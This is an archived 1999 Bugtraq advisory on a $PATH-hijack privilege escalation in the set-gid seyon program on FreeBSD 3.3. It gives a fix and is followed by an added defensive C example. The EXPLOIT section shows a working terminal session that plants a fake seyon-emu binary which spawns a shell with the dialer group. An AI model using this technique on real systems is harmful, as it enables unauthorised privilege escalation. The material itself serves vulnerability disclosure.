Bugtraq mailing list archives
FreeBSD 3.3's seyon vulnerability
From: btellier () USA NET (Brock Tellier)
Date: Mon, 8 Nov 1999 20:50:38 MST
Greetings,
In preparing for this advisory release, I checked for "seyon" vulnerabilities
in the bugtraq archives. I found that the exploit I had developed had already
been discussed in May 1997. However, this does not change the fact that the
current version of FreeBSD still ships a vulnerable version with vulnerable
privs. I believe this is still worth noting. Here is my advisory as it was
to be published before the previous vulnerability came to light.
OVERVIEW
A vulnerability exists in seyon v2.14b which will allow any user to upgrade
his or her privs to those with which seyon runs.
BACKGROUND
This advisory is based entirely off the work I've done on FreeBSD 3.3-RELEASE
and seyon 2.14b which is included on the FreeBSD installation CD as an
"additional package". When installed via sysinstall, seyon's permissions are
sgid "dialer". Different versions of seyon and different packages of 2.14b
may have different default permissions.
DETAILS
Upon startup, seyon executes the programs "seyon-emu" and "xterm". The paths
to these programs are not absolute and are resolved through the user's $PATH. By
adding a writable directory to our $PATH and placing our own version of
seyon-emu or xterm in it, we can make seyon run this program with egid
dialer.
EXPLOIT
bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999
jkh () highwing cdrom com:/usr/src/sys/compile/GENERIC i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
setregid(getegid(), getegid());
system("/usr/local/bin/bash");
}
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$
FIX
Simply chmod 750 `which seyon` and add selected users to the "dialer" group.
Brock Tellier
UNIX Administrator
Chicago, IL, USA
btellier () usa net
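The root cause described under DETAILS is a set-gid program resolving helper names through the caller's $PATH. As an added example (not code from seyon, FreeBSD, or the original post), this C shows the defensive pattern for a privileged launcher: refuse non-absolute helper paths, drop set-id privileges before exec, and pass a fixed environment. The names run_helper, helper_path_ok and SAFE_ENV are hypothetical, and it assumes the helper does not need the privileged group.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Added example; run_helper, helper_path_ok and SAFE_ENV are hypothetical names. */
/* Fixed environment handed to helpers; the caller's $PATH is never used. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* 0 if the helper is named by absolute path (no $PATH search), else -1. */
int helper_path_ok(const char *path)
{
    return (path != NULL && path[0] == '/') ? 0 : -1;
}

/* Run a helper without set-id privileges. Returns its exit status,
 * or -1 if the path is refused or the helper could not be run. */
int run_helper(const char *path, char *const argv[])
{
    int status;
    pid_t pid;

    if (helper_path_ok(path) != 0)
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        gid_t rgid = getgid();
        uid_t ruid = getuid();
        /* Drop group first, then user, and verify the drop took effect. */
        if (setregid(rgid, rgid) != 0 || setreuid(ruid, ruid) != 0)
            _exit(126);
        if (getegid() != rgid || geteuid() != ruid)
            _exit(126);
        execve(path, argv, SAFE_ENV);   /* no execvp(), no system() */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *argv[] = { "sh", "-c", "echo helper egid=$(id -g)", NULL };
    setenv("PATH", ".:/usr/bin:/bin", 1);  /* constructed hostile $PATH */
    printf("exit status: %d\n", run_helper("/bin/sh", argv));
    return 0;
}
```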
